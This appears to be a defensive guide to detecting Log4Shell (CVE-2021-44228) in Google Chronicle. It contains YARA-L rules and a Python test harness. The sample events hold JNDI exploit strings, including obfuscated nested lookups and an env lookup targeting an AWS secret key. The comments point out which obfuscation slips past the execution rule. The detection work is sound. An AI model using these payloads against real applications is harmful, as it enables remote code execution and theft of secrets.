Detecting and responding to Apache “Log4j 2” using Google Chronicle

Raw Log Search

Historical Raw Log Search Across The Enterprise

Detection Rules

rule cve_2021_44228_execution {
  meta:
    tactic = "TA0002"
    description = "Identifies process execution using JNDI strings."
  events:
    $event.metadata.event_type = "PROCESS_LAUNCH"
    // Literal "${jndi:<scheme>:" in the command line; obfuscated lookups such as
    // "${${lower:j}ndi:" are not matched by this pattern.
    $event.target.process.command_line = /.*\$\{jndi\:(ldap|rmi|ldaps|dns)\:.*\}.*/ nocase
    $event.principal.hostname = $hostname
  condition:
    $event
}

rule cve_2021_44228_http {
  meta:
    tactic = "TA0002"
    technique = "T1059"
    description = "Identifies JNDI strings in network user agents or URIs."
    reference = "https://www.lunasec.io/docs/blog/log4j-zero-day/"
  events:
    $event.metadata.event_type = "NETWORK_HTTP"
    // The pattern is a regular expression, so it must be written as /.../ rather
    // than a quoted string (a quoted string is an exact-match comparison in YARA-L).
    // The third alternative, ":j}.*{", catches nested-lookup obfuscation such as
    // "${${lower:j}ndi:${lower:l}dap://...}".
    (
      $event.network.http.user_agent = /.*(\{jndi\:.*\}|\{env\:.*\}|\:j\}.*\{).*/ nocase or
      $event.network.http.referral_url = /.*(\{jndi\:.*\}|\{env\:.*\}|\:j\}.*\{).*/ nocase or
      $event.target.url = /.*(\{jndi\:.*\}|\{env\:.*\}|\:j\}.*\{).*/ nocase
    )
  condition:
    $event
}
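To see what the two rules above do and do not catch before deploying them, it helps to run the same regexes over a handful of events offline. The following is an added example, not code from the article or from Chronicle: it ports the two YARA-L regexes to Python's `re` (both engines agree on the syntax used here), builds a few constructed UDM-shaped events by hand (the callback address is from a documentation IP range and is a placeholder), and applies each rule's logic to them. The field paths mirror the rules; the dict layout, helper names and sample values are assumptions for this harness.

```python
import re
from typing import Any, Dict, List, Tuple

# Python ports of the regexes in cve_2021_44228_execution and cve_2021_44228_http
# (added example; braces are escaped so the intent is unambiguous in RE2 and re).
EXECUTION_RE = re.compile(r"\$\{jndi:(ldap|rmi|ldaps|dns):.*\}", re.IGNORECASE)
HTTP_RE = re.compile(r"\{jndi:.*\}|\{env:.*\}|:j\}.*\{", re.IGNORECASE)

# UDM fields the HTTP rule inspects, as dotted paths.
HTTP_FIELDS = ("network.http.user_agent", "network.http.referral_url", "target.url")


def get_field(event: Dict[str, Any], dotted: str) -> str:
    """Walk a nested dict by dotted path; missing or non-string values read as ''."""
    cur: Any = event
    for key in dotted.split("."):
        if not isinstance(cur, dict) or key not in cur:
            return ""
        cur = cur[key]
    return cur if isinstance(cur, str) else ""


def rule_execution(event: Dict[str, Any]) -> bool:
    """PROCESS_LAUNCH whose command line carries a literal ${jndi:<scheme>: lookup."""
    return (get_field(event, "metadata.event_type") == "PROCESS_LAUNCH"
            and EXECUTION_RE.search(get_field(event, "target.process.command_line")) is not None)


def rule_http(event: Dict[str, Any]) -> bool:
    """NETWORK_HTTP with a JNDI/env lookup or nested-lookup obfuscation in UA, Referer or URL."""
    return (get_field(event, "metadata.event_type") == "NETWORK_HTTP"
            and any(HTTP_RE.search(get_field(event, f)) for f in HTTP_FIELDS))


def run_rules(events: List[Dict[str, Any]]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires on each event."""
    hits: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        if rule_execution(ev):
            hits.append((i, "cve_2021_44228_execution"))
        if rule_http(ev):
            hits.append((i, "cve_2021_44228_http"))
    return hits


# Constructed sample events (hand-built, not real telemetry).
SAMPLE_EVENTS: List[Dict[str, Any]] = [
    # 0: plain ${jndi:ldap://...} in a command line -> execution rule fires
    {"metadata": {"event_type": "PROCESS_LAUNCH"}, "principal": {"hostname": "web-01"},
     "target": {"process": {"command_line":
                "java -jar app.jar '${jndi:ldap://198.51.100.23:1389/Exploit}'"}}},
    # 1: benign launch -> nothing fires
    {"metadata": {"event_type": "PROCESS_LAUNCH"}, "principal": {"hostname": "web-01"},
     "target": {"process": {"command_line": "/usr/bin/java -jar app.jar"}}},
    # 2: nested-lookup obfuscation; the execution regex needs a literal "${jndi:" and misses it
    {"metadata": {"event_type": "PROCESS_LAUNCH"}, "principal": {"hostname": "web-02"},
     "target": {"process": {"command_line":
                "java -jar app.jar '${${lower:j}ndi:${lower:l}dap://198.51.100.23:1389/a}'"}}},
    # 3: classic payload in the User-Agent -> http rule fires
    {"metadata": {"event_type": "NETWORK_HTTP"},
     "network": {"http": {"user_agent": "${jndi:ldap://198.51.100.23:1389/a}"}}},
    # 4: the same obfuscation in a URL is caught by the ":j}.*{" alternative
    {"metadata": {"event_type": "NETWORK_HTTP"},
     "target": {"url": "http://shop.example/search?q=${${lower:j}ndi:${lower:l}dap://198.51.100.23:1389/a}"}},
    # 5: env-variable lookup in the Referer, the exfil pattern the "{env:" alternative targets
    {"metadata": {"event_type": "NETWORK_HTTP"},
     "network": {"http": {"referral_url": "${env:AWS_SECRET_ACCESS_KEY}"}}},
    # 6: ordinary browser traffic -> nothing fires
    {"metadata": {"event_type": "NETWORK_HTTP"},
     "network": {"http": {"user_agent": "Mozilla/5.0 (X11; Linux x86_64)"}}},
]

if __name__ == "__main__":
    for idx, name in run_rules(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

Event 2 is the caveat worth noting: the execution rule anchors on a literal `${jndi:` and stays silent on nested-lookup obfuscation, while the HTTP rule's `:j}.*{` alternative does pick the same string up in URL fields. If you care about obfuscated command lines, extend the execution rule with a comparable alternative rather than relying on the HTTP rule alone.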

Identify Low Prevalence Events

Low prevalence destination Investigation in Chronicle
